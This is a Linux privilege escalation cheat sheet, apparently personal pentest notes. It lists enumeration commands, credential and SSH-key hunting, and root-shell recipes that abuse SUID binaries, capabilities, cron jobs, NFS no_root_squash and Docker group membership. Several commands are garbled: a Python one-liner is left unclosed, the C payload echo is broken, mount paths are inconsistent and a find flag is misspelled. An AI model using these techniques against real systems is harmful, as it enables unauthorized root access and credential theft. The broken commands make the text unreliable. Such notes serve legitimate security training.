# Linux privilege escalation ## Manual enumeration ### User ``` whoami id history ``` ### Other Users ``` cat /etc/passwd who ``` ### Privileges ``` sudo -l cat /etc/sudoers ``` ### File system ``` pwd (current location) echo $PATH ``` ### Hostname ``` hostname ``` ### OS and architecture ``` cat /etc/issue cat /etc/*-release uname -a lscpu ``` ### Processes and services ``` ps aux ``` ### Network ``` ifconfig OR ip a (interfaces) route OR route l (routing table) netstat -anp OR ss -anp (active connections) arp -a ``` ### Scheduled tasks ``` ls -lah /etc/cron* (contents of all cron files) cat /etc/crontab (admins often add jobs here, usually run w/ root privs) cat var/log/cron.log (inspect for running cron jobs) ``` ### Applications/patch levels/drivers/kernel modules ``` dpkg -l lsmod (lists all kernel modules loaded) /sbin/modinfo $modulename (more info on specific kernel modules - libata in this example) ``` ### Readable/writeable directories ``` find / -writeable -type d 2>/dev/null ``` ### Unmounted disks ``` mount cat /etc/fstab (drives mounted at boot) lsblk (all available disks) ``` ### Sensitive files ``` history cat /etc/passwd cat /etc/shadow cat /etc/group ``` ### Passwords Search the file system for passwords. Try additional search terms (pass, etc.). ``` grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null ``` ### SSH keys Search the filesystem for SSH keys. Public keys are typically stored in the "authorized\_keys" folder, private keys are stored as "id\_rsa". ``` find / -name id_rsa* 2> /dev/null find / -name authorized_keys* 2> /dev/null ``` ## Automated tools ``` LinPeas.sh LinEnum.sh Linux Exploit Suggester LinuxPrivChecker.py ``` ## Exploitation paths ### SUID Files SUID files allow individuals to execute files using the privileges of another user. They are identifiable by an "s" in the third character of the root permissions for a file. You can search manually with: ``` find / -perm -u=s -type f 2>/dev/null ``` If you find identify a SUID file, check [GTFO bins](https://gtfobins.github.io/) for exploits ### Capabilities The exploitation for capabilities is similar to that of SUID files. Search for capabilities with: ``` getcap -r / 2>/dev/null ``` Look for "+ep" at the end of any returned items. If present, exploitation possible. ### Execution Run Python to escalate ``` /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash") ``` Other possibly exploitable capabilities include perl, tar, openssl (check [GTFO bins](https://gtfobins.github.io/)) ### Scheduled Tasks ``` cat /etc/cron* cat /etc/crontab (admins often add jobs here, usually run w/ root privs) cat var/log/cron.log (inspect for running cron jobs) systemctl list-timers --all ``` Columns represent minute, hour, day of month, month, day of week. Asterisks in columns indicate "all", asterisks in all fields indicates that the task runs every minute/hour/day of month/month/day of week #### Exploitation First, check the file type using the `file` command and whether or not you have write access. Sometimes replacing the file with one created on your attacking machine is easier than modifying the file that is in place. If so, rename the current file as \*.old and use wget to replace with the version created on your attack machine. ``` echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > script **Wait for the job to execute, then /tmp/bash -p ``` ### NFS root squashing Check `cat /etc/exports` for results indicating "no\_root\_squash", indicating folders that are shareable and can be mounted. If available, remote commands are executed as root. #### Exploitation From the attacking machine: Search for mountable shares ``` showmount -e ipaddress ``` Create a new directory: ``` mkdir /tmp/mntme ``` Mount the folder: ``` mount -o rw, vers=2 ipaddress:/tmp /tmp/mountme ``` Create malicious file: ``` echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; /tmp/mountme/x.c ``` Compile the file: ``` gcc /tmp/mountme/x.c -o /tmp/mountme/x ``` Return to the victim machine, navigate to the target directory (/tmp), and execute the file ``` ./x ``` ### Docker If you are in the Docker group, check to see which containers are available: ``` docker image ls ``` Run the image: ``` docker run -v /:/mnt --rm -it alpine chroot /mnt sh ```